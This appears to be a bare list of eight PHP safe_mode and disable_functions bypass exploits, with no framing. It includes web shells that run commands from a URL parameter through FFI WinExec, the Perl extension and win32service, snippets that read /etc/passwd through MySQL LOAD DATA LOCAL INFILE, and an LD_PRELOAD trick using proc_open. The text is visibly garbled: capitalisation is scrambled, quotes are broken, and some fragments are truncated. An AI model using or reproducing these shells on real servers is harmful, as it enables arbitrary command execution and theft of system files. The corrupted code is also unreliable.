1-php <= 4.4.7/5.2.3 mysql/mysqli Safe Mode Bypass Vulnerability
<?phpfile_get_contents ('/etc/passwd '); $l = mysql_connect ("localhost", "root"), mysql_query ("Create DATABASE a"), mysql_query ("Create TABLE a.a (a varchar (1024) )"); mysql_query ("GRANT Select,insert on A.A to ' aaaa ' @ ' localhost '); Mysql_close ($l); mysql_connect ("localhost", "AAAA"); mysql_query ("LOAD DATA LOCAL INFILE '/etc/passwd ' into TABLE a.a"); $result = mysql_query ("Select a From A.A"); while (list ($row) = Mysql_fetch_row ($result)) print $row. Chr (?>);
2-mysql
<?phpfunction R ($fp, & $buf, $len, & $err) {print fread ($fp, $len);} $m = new mysqli (' localhost ', ' aaaa ', ', ' a ‘); $m->options (Mysqli_opt_local_infile, 1); $m->set_local_infile_handler ("R"); $m->query ("LOAD DATA LOCAL INFILE '/etc/passwd ' into TABLE a.a"); $m->close ();?>
3-php FFI Extension safe_mode Bypass Exploit
<?php if (!extension_loaded (' ffi ')) die (' error:ffi extension are not loaded! '); $command = (Empty ($_get[' cmd ')))? ' Dir ': $_get[' cmd ']; if (Is_writeable (DirName (__file__))) $tmp =dirname (__ file__); ElseIf (Is_writeable (Ini_get (' Session.save_path ') )) $tmp =ini_get (' Session.save_path '); ElseIf (is_writeable (Ini_get (' Upload_tmp_dir '))) $tmp =ini_get (' Upload_tmp_dir '); Else die (' Error:move exploit to writeable folder. '); $output = "$tmp \ \". Uniqid (' NJ '); $api =new ffi ("[lib= ' Kernel32.dll '] int winexec (char *app,int SW);"); $res = $api->winexec ("cmd.exe/c $command >\" $output \ "", 0); while (!file_exists ($output)) sleep (1); $con = "; $FP =fopen ($output, ' R '); while (!feof ($FP)) $con. =fgets ($FP, 1024); Fclose ($FP); $con =htmlspecialchars ($con); echo "<pre> $con </pre>"; Unlink ($output);?>
4-php 5.2.4 ioncube extension safe_mode and disable_functions protections Bypass
$MyBoot _ioncube = Ioncube_read_file ($path. " Boot. ini "); echo $MyBoot _readfile; echo "<br><br>ioncube output:<br><br>"; echo $MyBoot _ioncube;?>
5-php Perl Extension Safe_mode Bypass
<?php if (!extension_loaded (' Perl ')) Die (' Perl extension are not loaded '); if (!isset ($_get)) $_get=& $HTTP _get_vars; if (Empty ($_get[' cmd '))) $_get[' cmd ']= (Strtoupper (substr (php_os,0,3)) = = ' WIN ')? ' Dir ': ' ls '; $perl =new Perl (); echo "<textarea rows= ' cols= ' >"; $perl->eval ("System ('". $_get[' cmd ') ."‘)"); echo "</textarea>"; $_get[' cmd ']=htmlspecialchars ($_get[' cmd '); echo "<br><form>cmd: <input type=text name=cmd value= '". $_get[' CMD ']. "' Size=25></form> '?" >
6-php 5.x (win32service) Local Safe Mode Bypass Exploit
<?php $command = (isset ($_get[' cmd '))) $_get[' cmd ']: ' dir '; #cammand $dir =ini_get (' Upload_tmp_dir '); #Directory to store command's output if (!extension_loaded (' Win32service ')) die (' win32ser Vice extension not found! '); $name = $dir. " \ \ ". Uniqid (' NJ '); $n =uniqid (' NJ '); $cmd = (Empty ($_server[' ComSpec '))? ' D:\\windows\\system32\\cmd.exe ': $_server[' ComSpec ']; Win32_create_service (' service ' = $n, ' Display ' + $n, ' path ' = ' $cmd, ' params ' = '/'/' $command >\ ' $ Name\ "")); Win32_start_service ($n); Win32_stop_service ($n); Win32_delete_service ($n); $exec =file_get_contents ($name); Unlink ($name); echo "<pre>". Htmlspecialchars ($exec). " </pre> ";?>
7-php 5.2.3 win32std extension safe_mode and disable_functions protections Bypass
<?php if (!extension_loaded ("win32std")) Die ("win32std extension required!"); System ("cmd.exe"); Just to being sure that protections work well win_shell_execute (". \\.. \\.. \\.. \\windows\\system32\\cmd.exe ");?>
8-php Safe_mode Bypass via Proc_open () and custom Environment
<?php$path= "/var/www"; Change to your writable path $a =open ($path. " /.comm "," w "); Fputs ($a, $_get["C"]); Fclose ($a); $descriptorspec = Array ( 0--> Array ("Pipe", "R"), 1 => Array ("File", $path. " /output.txt "," W "), 2 => Array (" File ", $path." /errors.txt "," a "); $cwd = '. '; $env = Array (' Ld_preload ' => $path. " /a.so "); $process = Proc_open (' id >/tmp/a ', $descriptorspec, $pipes, $CWD, $env); Example Command-should not succeed sleep (1); $a =fopen ($path. " /.comm1 "," R "); echo "<strong>"; while (!feof ($a)) {$b =fgets ($a); echo $b;} fclose ($a); >
PHP SAFE MODE BYPASS